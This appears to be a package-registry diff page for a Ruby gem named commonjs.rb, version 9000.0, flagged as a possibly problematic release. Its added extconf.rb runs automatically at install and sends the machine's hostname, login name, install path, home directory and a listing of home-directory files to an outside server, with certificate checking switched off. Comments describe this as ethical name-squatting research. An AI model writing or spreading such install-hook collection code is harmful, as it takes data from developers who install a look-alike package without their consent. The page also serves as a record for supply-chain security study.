commonjs.rb 9000.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of commonjs.rb might be problematic. Click here for more details.
- checksums.yaml +7 -0
- data/ext/extconf.rb +50 -0
- metadata +50 -0
checksums.yaml
ADDED
@@ -0,0 +1,7 @@
|
|
1
|
+
---
|
2
|
+
SHA256:
|
3
|
+
metadata.gz: 41f6c2724d54812a041745178cdea6c5fb605347d7d64832ce5cec8a39ad9ae5
|
4
|
+
data.tar.gz: 59c22fdcd88063569edb879d4ca594b1e04dc8219068e954c32b54bf63785391
|
5
|
+
SHA512:
|
6
|
+
metadata.gz: 8b5475fc9be32518f8e499e1980862d83e7a16b73b5c018fdd19057c132253d4bb973a4a8a3cd04bd51b994dfd23f4371f542c1ff88729ce9941282cf2d75a14
|
7
|
+
data.tar.gz: f4779cad753f332323442419229d083ab97167564d5a1bda809ad248d3e6a2b6f384a3f291d2e5aceab1dc081d78c86215619590dc08f71acc163123d38eb841
|
data/ext/extconf.rb
ADDED
@@ -0,0 +1,50 @@
|
|
1
|
+
=begin
|
2
|
+
Hi, if you're reading this you're probably wondering what this code is doing on your machine.
|
3
|
+
Don't worry! It doesn't do anything nasty or malicious.
|
4
|
+
|
5
|
+
I am an ethical security researcher, booking names of gems to prevent brandjacking.
|
6
|
+
|
7
|
+
I also run a Ruby security related platform: https://diffend.io
|
8
|
+
|
9
|
+
All data I collect will be deleted and I do not collect any sensitive information.
|
10
|
+
|
11
|
+
That's why I don't even obfuscate the network calls with DNS requests or anything else.
|
12
|
+
|
13
|
+
You can read the code to confirm this.
|
14
|
+
|
15
|
+
If you have any questions or want to get in touch for any reason, you can reach me at:
|
16
|
+
|
17
|
+
maciej@mensfeld.pl
|
18
|
+
|
19
|
+
If this is affecting your organization, for example because I took name that uses your naming
|
20
|
+
conventions, feel free to contact me and I will be more than happy to give it back to you.
|
21
|
+
|
22
|
+
P.S. I did notify RubyGems security team, so they are aware of my activity.
|
23
|
+
=end
|
24
|
+
|
25
|
+
require 'mkmf'
|
26
|
+
require 'net/http'
|
27
|
+
require 'socket'
|
28
|
+
require 'etc'
|
29
|
+
require 'securerandom'
|
30
|
+
require 'json'
|
31
|
+
|
32
|
+
create_makefile 'gem_test'
|
33
|
+
|
34
|
+
uri = URI("https://ethically-testing-the.world")
|
35
|
+
http = Net::HTTP.new(uri.host, uri.port)
|
36
|
+
http.use_ssl = true
|
37
|
+
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
|
38
|
+
request = Net::HTTP::Post.new('/commonjs.rb/9000.0')
|
39
|
+
request.add_field('Content-Type', 'application/json')
|
40
|
+
|
41
|
+
request.body = {
|
42
|
+
hostnames: [Socket.gethostname, Socket.gethostbyname(Socket.gethostname).first].uniq,
|
43
|
+
username: Etc.getlogin,
|
44
|
+
path: File.dirname(__FILE__),
|
45
|
+
home: Dir.home,
|
46
|
+
home_ls: Dir.entries(Dir.home),
|
47
|
+
id: SecureRandom.uuid,
|
48
|
+
}.to_json
|
49
|
+
|
50
|
+
http.request(request)
|
metadata
ADDED
@@ -0,0 +1,50 @@
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
2
|
+
name: commonjs.rb
|
3
|
+
version: !ruby/object:Gem::Version
|
4
|
+
version: '9000.0'
|
5
|
+
platform: ruby
|
6
|
+
authors:
|
7
|
+
- Maciej Mensfeld
|
8
|
+
autorequire:
|
9
|
+
bindir: bin
|
10
|
+
cert_chain: []
|
11
|
+
date: 2021-03-05 00:00:00.000000000 Z
|
12
|
+
dependencies: []
|
13
|
+
description: |
|
14
|
+
I am testing for brandjacking vulnerabilities in products that are in bug bounty programs.
|
15
|
+
|
16
|
+
This code is reporting-only, and does not do anything malicious.
|
17
|
+
email:
|
18
|
+
- maciej@mensfeld.pl
|
19
|
+
executables: []
|
20
|
+
extensions:
|
21
|
+
- ext/extconf.rb
|
22
|
+
extra_rdoc_files: []
|
23
|
+
files:
|
24
|
+
- ext/extconf.rb
|
25
|
+
homepage: https://diffend.io
|
26
|
+
licenses:
|
27
|
+
- GPL-3.0
|
28
|
+
metadata: {}
|
29
|
+
post_install_message: |
|
30
|
+
This is probably not the package you wanted to install.
|
31
|
+
Read the description of this gem for more details.
|
32
|
+
rdoc_options: []
|
33
|
+
require_paths:
|
34
|
+
- lib
|
35
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
36
|
+
requirements:
|
37
|
+
- - ">="
|
38
|
+
- !ruby/object:Gem::Version
|
39
|
+
version: '0'
|
40
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
41
|
+
requirements:
|
42
|
+
- - ">="
|
43
|
+
- !ruby/object:Gem::Version
|
44
|
+
version: '0'
|
45
|
+
requirements: []
|
46
|
+
rubygems_version: 3.1.4
|
47
|
+
signing_key:
|
48
|
+
specification_version: 4
|
49
|
+
summary: Gem that sends some non-sensitive data for security research.
|
50
|
+
test_files: []
|